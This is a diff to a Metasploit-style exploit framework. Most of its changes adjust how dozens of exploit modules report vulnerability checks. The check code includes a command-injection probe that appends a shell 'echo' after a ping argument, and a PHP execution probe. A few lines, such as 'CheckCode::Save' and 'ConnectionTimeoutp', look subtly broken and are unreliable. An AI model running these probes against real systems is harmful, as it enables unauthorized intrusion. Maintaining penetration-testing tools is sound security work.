+69,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "pc=127.0.0.1; " data << Rex::Text.uri_encode("echo #{fingerprint}") data << "%26" - print_status("#{peer} - Sending check") + vprint_status("#{peer} - Sending check") begin res = send_request_cgi({ @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index c0665dd1a1..2fe8f0116e 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -60,8 +60,8 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => "#{uri}/login.php" }) - if res and res.body =~ /WebCalendar v1.2.\d/ - return Exploit::CheckCode::Vulnerable + if res and res.body =~ /WebCalendar v1\.2\.\d/ + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/linux/http/zabbix_sqli.rb b/modules/exploits/linux/http/zabbix_sqli.rb index 2d7a564c1d..ca19fb5a97 100644 --- a/modules/exploits/linux/http/zabbix_sqli.rb +++ b/modules/exploits/linux/http/zabbix_sqli.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect installed version") + vprint_status("#{peer} - Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -72,10 +72,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/ version = $1 - print_status("#{peer} - Zabbix version #{version} detected") + vprint_status("#{peer} - Zabbix version #{version} detected") else # If this fails, guest access may not be enabled - print_status("#{peer} - Unable to access httpmon.php") + vprint_status("#{peer} - Unable to access httpmon.php") return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index fe82b999be..96e02f8cbf 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -66,23 +66,23 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from config file - print_status("#{peer} - Sending check") + vprint_status("#{peer} - Sending check") begin res = send_request_cgi({ 'uri' => '/config/global.conf' }) - if res and res.code == 200 and res.body =~ /#version ZEN\s+\$version=\"(2|3\.0\-rc1)/ + if res and res.code == 200 and res.body =~ /#version ZEN\s+\$version=\"(2|3\.0\-rc1)/ return Exploit::CheckCode::Appears elsif res and res.code == 200 and res.body =~ /zenloadbalancer/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown - + return Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index 361d8d9ec4..a0103295ed 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -69,14 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => "GET", 'uri' => "/zport/acl_users/cookieAuthHelper/login_form" }) - return Exploit::CheckCode::Vulnerable if res.body =~ /

Copyright © 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+3\./ + return Exploit::CheckCode::Appears if res.body =~ /

Copyright © 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+3\./ return Exploit::CheckCode::Detected if res.body =~ // return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown - + return Exploit::CheckCode::Save end def exploit diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index 58b8b6bda2..54902a92d6 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb @@ -61,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect - if (banner =~ /IMAP4rev1 v12.264/) - return Exploit::CheckCode::Vulnerable + if (banner =~ /IMAP4rev1 v12\.264/) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe diff --git a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb index c73a8a4f4d..8c55d1c094 100644 --- a/modules/exploits/linux/local/sophos_wpa_clear_keys.rb +++ b/modules/exploits/linux/local/sophos_wpa_clear_keys.rb @@ -62,7 +62,7 @@ class Metasploit4 < Msf::Exploit::Local return CheckCode::Detected end - return CheckCode::Unknown + return CheckCode::Safe end def exploit diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb index 9b8aa1f9f4..8ae3c846ea 100644 --- a/modules/exploits/linux/local/vmware_mount.rb +++ b/modules/exploits/linux/local/vmware_mount.rb @@ -57,7 +57,7 @@ class Metasploit4 < Msf::Exploit::Local def check if setuid?("/usr/bin/vmware-mount") - CheckCode::Vulnerable + CheckCode::Appears else CheckCode::Safe end diff --git a/modules/exploits/linux/local/zpanel_zsudo.rb b/modules/exploits/linux/local/zpanel_zsudo.rb index 36032a4178..f5e2792116 100644 --- a/modules/exploits/linux/local/zpanel_zsudo.rb +++ b/modules/exploits/linux/local/zpanel_zsudo.rb @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Exploit::Local return CheckCode::Detected end - return CheckCode::Unknown + return CheckCode::Safe end def exploit diff --git a/modules/exploits/linux/misc/hp_vsa_login_bof.rb b/modules/exploits/linux/misc/hp_vsa_login_bof.rb index adbecb1bbd..64ac53e265 100644 --- a/modules/exploits/linux/misc/hp_vsa_login_bof.rb +++ b/modules/exploits/linux/misc/hp_vsa_login_bof.rb @@ -70,13 +70,13 @@ class Metasploit3 < Msf::Exploit::Remote def check connect packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"") - print_status("#{rhost}:#{rport} Sending login packet to check...") + vprint_status("#{rhost}:#{rport} Sending login packet to check...") sock.put(packet) res = sock.get_once disconnect if res and res=~ /OK/ and res =~ /Login/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif res and res =~ /FAILED/ and res =~ /version/ return Exploit::CheckCode::Detected end diff --git a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb index f96767e3bd..814fded403 100644 --- a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb +++ b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - print_status("Checking if remote NRPE supports command line arguments") + vprint_status("Checking if remote NRPE supports command line arguments") begin # send query asking to run "fake_check" command with command substitution in arguments @@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe rescue Errno::ECONNRESET => reset unless datastore['NRPESSL'] or @force_ssl - print_status("Retrying with ADH SSL") + vprint_status("Retrying with ADH SSL") @force_ssl = true retry end diff --git a/modules/exploits/linux/misc/sercomm_exec.rb b/modules/exploits/linux/misc/sercomm_exec.rb index 17a91d77df..8625e5baff 100644 --- a/modules/exploits/linux/misc/sercomm_exec.rb +++ b/modules/exploits/linux/misc/sercomm_exec.rb @@ -141,14 +141,14 @@ class Metasploit3 < Msf::Exploit::Remote case fprint when 'BE' - print_status("Detected Big Endian") - return Msf::Exploit::CheckCode::Vulnerable + vprint_status("Detected Big Endian") + return Msf::Exploit::CheckCode::Appears when 'LE' - print_status("Detected Little Endian") - return Msf::Exploit::CheckCode::Vulnerable + vprint_status("Detected Little Endian") + return Msf::Exploit::CheckCode::Appears end - return Msf::Exploit::CheckCode::Unknown + return Msf::Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/linux/misc/zabbix_server_exec.rb b/modules/exploits/linux/misc/zabbix_server_exec.rb index 384e496d42..95cc260886 100644 --- a/modules/exploits/linux/misc/zabbix_server_exec.rb +++ b/modules/exploits/linux/misc/zabbix_server_exec.rb @@ -82,17 +82,17 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "echo #{clue}" connect - print_status("#{peer} - Sending 'Command' request...") + vprint_status("#{peer} - Sending 'Command' request...") res = send_command(sock, node_id, cmd) disconnect if res - print_status(res) + vprint_status(res) if res =~ /#{clue}/ return Exploit::CheckCode::Vulnerable elsif res =~ /-1/ and res=~ /NODE (\d*)/ node_id = $1 - print_good("#{peer} - Node ID #{node_id} discovered") + vprint_good("#{peer} - Node ID #{node_id} discovered") else return Exploit::CheckCode::Safe end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retry with the good node_id connect - print_status("#{peer} - Sending 'Command' request with discovered Node ID...") + vprint_status("#{peer} - Sending 'Command' request with discovered Node ID...") res = send_command(sock, node_id, cmd) disconnect if res and res =~ /#{clue}/ diff --git a/modules/exploits/linux/postgres/postgres_payload.rb b/modules/exploits/linux/postgres/postgres_payload.rb index 3515686a94..5d4dfab9da 100644 --- a/modules/exploits/linux/postgres/postgres_payload.rb +++ b/modules/exploits/linux/postgres/postgres_payload.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote version = postgres_fingerprint if version[:auth] - return CheckCode::Vulnerable + return CheckCode::Appears else print_error "Authentication failed. #{version[:preauth] || version[:unknown]}" return CheckCode::Safe diff --git a/modules/exploits/linux/samba/setinfopolicy_heap.rb b/modules/exploits/linux/samba/setinfopolicy_heap.rb index eb465fbe83..66c7d88f19 100644 --- a/modules/exploits/linux/samba/setinfopolicy_heap.rb +++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb @@ -282,7 +282,7 @@ class Metasploit3 < Msf::Exploit::Remote version = smb_peer_lm().scan(/Samba (\d\.\d.\d*)/).flatten[0] minor = version.scan(/\.(\d*)$/).flatten[0].to_i - print_status("Version found: #{version}") + vprint_status("Version found: #{version}") return Exploit::CheckCode::Appears if version =~ /^3\.4/ and minor < 16 return Exploit::CheckCode::Appears if version =~ /^3\.5/ and minor < 14 diff --git a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb index e37e619ff1..1ede0f8401 100644 --- a/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb +++ b/modules/exploits/multi/ftp/wuftpd_site_exec_format.rb @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote ret = connect_login # We just want the banner to check against our targets.. - print_status("FTP Banner: #{banner.strip}") + vprint_status("FTP Banner: #{banner.strip}") status = Exploit::CheckCode::Safe if banner =~ /Version wu-2\.(4|5)/ status = Exploit::CheckCode::Appears diff --git a/modules/exploits/multi/http/activecollab_chat.rb b/modules/exploits/multi/http/activecollab_chat.rb index 4479a5a824..80a45a69ca 100644 --- a/modules/exploits/multi/http/activecollab_chat.rb +++ b/modules/exploits/multi/http/activecollab_chat.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote if (cms and cms.body =~ /powered by activeCollab/) # detect the chat module if (chat and chat.code == 200) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end end return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/http/apprain_upload_exec.rb b/modules/exploits/multi/http/apprain_upload_exec.rb index 17e624a4f4..8c4c848762 100644 --- a/modules/exploits/multi/http/apprain_upload_exec.rb +++ b/modules/exploits/multi/http/apprain_upload_exec.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index 8fd8f46545..cea0579de2 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php") }) if res and res.body =~ /\Pet Rate Admin \- Banner Manager\<\/title\>/ - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb index 38ad1d8c45..c68da26ec9 100644 --- a/modules/exploits/multi/http/cisco_dcnm_upload.rb +++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb @@ -88,6 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -95,19 +96,18 @@ class Metasploit3 < Msf::Exploit::Remote res.body.to_s =~ /Data Center Network Manager/ and res.body.to_s =~ /

Version: (.*)<\/div>/ version = $1 - print_status("Cisco Primer Data Center Network Manager version #{version} found") - elsif res.code == 200 and - res.body.to_s =~ /Data Center Network Manager/ + vprint_status("Cisco Primer Data Center Network Manager version #{version} found") + if version =~ /6\.1/ + return Exploit::CheckCode::Appears + else + return Exploit::CheckCode::Detected + end + + elsif res.code == 200 and res.body.to_s =~ /Data Center Network Manager/ return Exploit::CheckCode::Detected - else - return Exploit::CheckCode::Safe end - if version =~ /6\.1/ - return Exploit::CheckCode::Vulnerable - end - - return Exploit::CheckCode::Safe + Exploit::CheckCode::Safe end def exploit diff --git a/modules/exploits/multi/http/coldfusion_rds.rb b/modules/exploits/multi/http/coldfusion_rds.rb index f4fe327e7b..c9f935683a 100644 --- a/modules/exploits/multi/http/coldfusion_rds.rb +++ b/modules/exploits/multi/http/coldfusion_rds.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/ - print_good "#{peer} - Administrator access available" + vprint_good "#{peer} - Administrator access available" else return Exploit::CheckCode::Safe end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote imghash = "596b3fc4f1a0b818979db1cf94a82220" if img == imghash - print_good "#{peer} - ColdFusion 9 Detected" + vprint_good "#{peer} - ColdFusion 9 Detected" else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/cuteflow_upload_exec.rb b/modules/exploits/multi/http/cuteflow_upload_exec.rb index c1003f7717..dd1474d71b 100644 --- a/modules/exploits/multi/http/cuteflow_upload_exec.rb +++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res.body =~ /\Version 2\.11\.2\<\/strong\>\/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif res.body =~ /\/ return Exploit::CheckCode::Detected else diff --git a/modules/exploits/multi/http/eaton_nsm_code_exec.rb b/modules/exploits/multi/http/eaton_nsm_code_exec.rb index ca37ae8fc1..c8646fe686 100644 --- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb +++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote res = execute_php_code("phpinfo();die();") if not res or res.code != 200 - print_error("Failed: Error requesting page") + vprint_error("Failed: Error requesting page") return CheckCode::Unknown end diff --git a/modules/exploits/multi/http/extplorer_upload_exec.rb b/modules/exploits/multi/http/extplorer_upload_exec.rb index 979bcf7497..a21b89ecc7 100644 --- a/modules/exploits/multi/http/extplorer_upload_exec.rb +++ b/modules/exploits/multi/http/extplorer_upload_exec.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote end if res.body =~ /2\.1\.(0RC\d|0|1|2)<\/version>/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end if res.body =~ /eXtplorer/ @@ -79,9 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index 5a1dc2b17b..7115369187 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -364,7 +364,16 @@ class Metasploit3 < Msf::Exploit::Remote # # Return POST data and data length, based on GlassFish edition # - def get_upload_data(boundary, version, war, app_base, typefield='', status_checkbox='', start='', viewstate='') + def get_upload_data(opts = {}) + boundary = opts[:boundary] + version = opts[:version] + war = opts[:war] + app_base = opts[:app_base] + typefield = opts[:typefield] + status_checkbox = opts[:status_checkbox] + start = opts[:start] + viewstate = opts[:viewstate] + data = '' if version == '3.0' @@ -501,7 +510,14 @@ class Metasploit3 < Msf::Exploit::Remote # Upload our payload, and execute it. This function will also try to automatically # clean up after itself. # - def upload_exec(session, app_base, jsp_name, target, war, edition, version) + def upload_exec(opts = {}) + session = opts[:session] + app_base = opts[:app_base] + jsp_name = opts[:jsp_name] + war = opts[:war] + edition = opts[:edition] + version = opts[:version] + if version == '2.x' or version == '9.x' path = "/applications/upload.jsf?appType=webApp" res = send_request(path, @verbs['GET'], session) @@ -553,7 +569,16 @@ class Metasploit3 < Msf::Exploit::Remote ctype = "multipart/form-data; boundary=---------------------------#{boundary}" end - post_data = get_upload_data(boundary, version, war, app_base, typefield, status_checkbox, start, viewstate) + post_data = get_upload_data({ + :boundary => boundary, + :version => version, + :war => war, + :app_base => app_base, + :typefield => typefield, + :status_checkbox => status_checkbox, + :start => start, + :viewstate => viewstate + }) #Upload our payload if version == '2.x' or version == '9.x' @@ -816,7 +841,14 @@ class Metasploit3 < Msf::Exploit::Remote #Upload, execute, cleanup, winning print_status("Uploading payload...") - res = upload_exec(session, app_base, jsp_name, mytarget, war, edition, version) + res = upload_exec({ + :session => session, + :app_base => app_base, + :jsp_name => jsp_name, + :war => war, + :edition => edition, + :version => version + }) else print_error("#{my_target_host()} - GlassFish - Failed to authenticate login") end diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index c224aac3f1..0a9bf7ad39 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -59,18 +59,18 @@ class Metasploit3 < Msf::Exploit::Remote res = login(base, user, pass) if res if res.code == 200 - print_error("#{peer} - Authentication failed") + vprint_error("#{peer} - Authentication failed") return Exploit::CheckCode::Unknown elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ - print_good("#{peer} - Authenticated successfully") + vprint_good("#{peer} - Authenticated successfully") return Exploit::CheckCode::Appears end end - return Exploit::CheckCode::Safe + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + vprint_error("#{peer} - Connection failed") end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/glpi_install_rce.rb b/modules/exploits/multi/http/glpi_install_rce.rb index 5675201e41..93d2f48df8 100644 --- a/modules/exploits/multi/http/glpi_install_rce.rb +++ b/modules/exploits/multi/http/glpi_install_rce.rb @@ -69,10 +69,10 @@ class Metasploit3 < Msf::Exploit::Remote m = Regexp.new(re, Regexp::IGNORECASE) matched = m.match(res.body) if matched and matched[3] =~ /0.(8[0-4].[0-1])|([0-7][0-9].[0-9])/ - print_good("Detected Version : #{matched[3]}") + vprint_good("Detected Version : #{matched[3]}") return Exploit::CheckCode::Appears elsif matched - print_error("Version #{matched[3]} is not vulnerable") + vprint_error("Version #{matched[3]} is not vulnerable") end return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb index 3fee6ed245..581fbce608 100644 --- a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb @@ -77,12 +77,12 @@ class Metasploit3 < Msf::Exploit::Remote res = send_command(cmd) if not res - print_error("#{peer} - Connection timed out") + vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end if res.code == 200 && res.body =~ /#{sig}/ - print_good("#{peer} - Running with user '#{res.body.split(sig)[1].strip}'") + vprint_good("#{peer} - Running with user '#{res.body.split(sig)[1].strip}'") return Exploit::CheckCode::Vulnerable end diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index dbca321677..19c9a442ed 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb @@ -105,20 +105,20 @@ class Metasploit3 < Msf::Exploit::Remote pass = datastore['PASSWORD'] # login - print_status("#{peer} - Authenticating as '#{user}'") + vprint_status("#{peer} - Authenticating as '#{user}'") res = login(user, pass) if res and res.code == 302 and res.headers['location'] !~ /authfailed/ - print_good("#{peer} - Authenticated successfully as '#{user}'") + vprint_good("#{peer} - Authenticated successfully as '#{user}'") # check access to the console - print_status("#{peer} - Checking access to the script console") + vprint_status("#{peer} - Checking access to the script console") get_nonce if @nonce.nil? return Exploit::CheckCode::Detected else - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end elsif res.headers.include?('X-Jenkins') or res.headers['location'] =~ /authfailed/ - print_error("#{peer} - Authentication failed") + vprint_error("#{peer} - Authentication failed") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe diff --git a/modules/exploits/multi/http/ispconfig_php_exec.rb b/modules/exploits/multi/http/ispconfig_php_exec.rb index 8c81bbf63d..12fbbbda2f 100644 --- a/modules/exploits/multi/http/ispconfig_php_exec.rb +++ b/modules/exploits/multi/http/ispconfig_php_exec.rb @@ -52,9 +52,6 @@ class Metasploit4 < Msf::Exploit::Remote ], self.class) end - def check - end - def lng datastore['LANGUAGE'] end diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb index 729a2e2d3c..a9cf6273fc 100644 --- a/modules/exploits/multi/http/jboss_invoke_deploy.rb +++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb @@ -90,20 +90,20 @@ class Metasploit4 < Msf::Exploit::Remote def check res = send_serialized_request('version.bin') if res.nil? - print_error("Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown elsif res.code != 200 - print_error("Unable to request version, returned http code is: #{res.code.to_s}") + vprint_error("Unable to request version, returned http code is: #{res.code.to_s}") return Exploit::CheckCode::Unknown end # Check if the version is supported by this exploit - return Exploit::CheckCode::Vulnerable if res.body =~ /CVSTag=Branch_4_/ - return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_4_/ - return Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_5_/ + return Exploit::CheckCode::Appears if res.body =~ /CVSTag=Branch_4_/ + return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_4_/ + return Exploit::CheckCode::Appears if res.body =~ /SVNTag=JBoss_5_/ if res.body =~ /ServletException/ # Simple check, if we caused an exception. - print_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit") + vprint_status("Target seems vulnerable, but the used JBoss version is not supported by this exploit") return Exploit::CheckCode::Appears end diff --git a/modules/exploits/multi/http/kordil_edms_upload_exec.rb b/modules/exploits/multi/http/kordil_edms_upload_exec.rb index 8a695a956f..1d9210b423 100644 --- a/modules/exploits/multi/http/kordil_edms_upload_exec.rb +++ b/modules/exploits/multi/http/kordil_edms_upload_exec.rb @@ -57,17 +57,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 if res.body =~ /
Kordil EDMS v2\.2\.60/ - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif res.body =~ /Kordil EDMS v/ return Exploit::CheckCode::Detected end end - return Exploit::CheckCode::Safe - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") - end - return Exploit::CheckCode::Unknown + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + vprint_error("#{peer} - Connection failed") + return Exploit::CheckCode::Unknown + end + + return Exploit::CheckCode::Safe end def upload(base, file) diff --git a/modules/exploits/multi/http/lcms_php_exec.rb b/modules/exploits/multi/http/lcms_php_exec.rb index b87389353b..fc1b6cdac2 100644 --- a/modules/exploits/multi/http/lcms_php_exec.rb +++ b/modules/exploits/multi/http/lcms_php_exec.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote def check target_url if @uri.empty? or @arg.empty? - print_error("Unable to get the page parameter, please reconfigure URI") + vprint_error("Unable to get the page parameter, please reconfigure URI") return end @@ -110,10 +110,10 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if response and response.body =~ /#{signature}/ - print_status("Signature: #{signature}") + vprint_status("Signature: #{signature}") return Exploit::CheckCode::Vulnerable else - print_error("Signature was not detected") + vprint_error("Signature was not detected") return Exploit::CheckCode::Safe end end diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index ffe1732df3..da787d5622 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote res = sqli_exec(Rex::Text.rand_text_alpha(1)) if res and res.body =~ /Error during search/ - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 0996cd97a4..acd70eb924 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -70,7 +70,7 @@ class Metasploit4 < Msf::Exploit::Remote def check fingerprint = rand_text_alpha(5) - print_status("#{peer} - Sending check...") + vprint_status("#{peer} - Sending check...") begin res = http_send_raw(fingerprint) rescue Rex::ConnectionError diff --git a/modules/exploits/multi/http/op5_license.rb b/modules/exploits/multi/http/op5_license.rb index b000181848..0ff2944781 100644 --- a/modules/exploits/multi/http/op5_license.rb +++ b/modules/exploits/multi/http/op5_license.rb @@ -54,8 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote end def check - print_status("Attempting to detect if the OP5 Monitor is vulnerable...") - print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}") + vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...") + vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}") # Try running/timing 'ping localhost' to determine is system is vulnerable start = Time.now diff --git a/modules/exploits/multi/http/op5_welcome.rb b/modules/exploits/multi/http/op5_welcome.rb index f374b6bb9b..42b2932835 100644 --- a/modules/exploits/multi/http/op5_welcome.rb +++ b/modules/exploits/multi/http/op5_welcome.rb @@ -54,8 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote end def check - print_status("Attempting to detect if the OP5 Monitor is vulnerable...") - print_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}") + vprint_status("Attempting to detect if the OP5 Monitor is vulnerable...") + vprint_status("Sending request to https://#{rhost}:#{rport}#{datastore['URI']}") # Try running/timing 'ping localhost' to determine is system is vulnerable start = Time.now diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index f14f2c997b..bc346979d8 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -97,18 +97,18 @@ class Metasploit3 < Msf::Exploit::Remote }) if (not res) or (res.code != 200) - print_error("Unable to make a request to: #{path}") + vprint_error("Unable to make a request to: #{path}") return Exploit::CheckCode::Unknown end versioncheck = res.body =~ /Openfire, \D*: (\d)\.(\d).(\d)\s*<\/div>/ if versioncheck.nil? then - print_error("Unable to detect Openfire version") + vprint_error("Unable to detect Openfire version") return Exploit::CheckCode::Unknown end - print_status("Detected version: #{$1}.#{$2}.#{$3}") + vprint_status("Detected version: #{$1}.#{$2}.#{$3}") version = "#{$1}#{$2}#{$3}".to_i return Exploit::CheckCode::Safe if version > 360 @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - Exploit::CheckCode::Vulnerable + Exploit::CheckCode::Appears end def get_plugin_jar(plugin_name) diff --git a/modules/exploits/multi/http/openx_backdoor_php.rb b/modules/exploits/multi/http/openx_backdoor_php.rb index 59f4408c39..62667b859f 100644 --- a/modules/exploits/multi/http/openx_backdoor_php.rb +++ b/modules/exploits/multi/http/openx_backdoor_php.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote if response.nil? CheckCode::Unknown 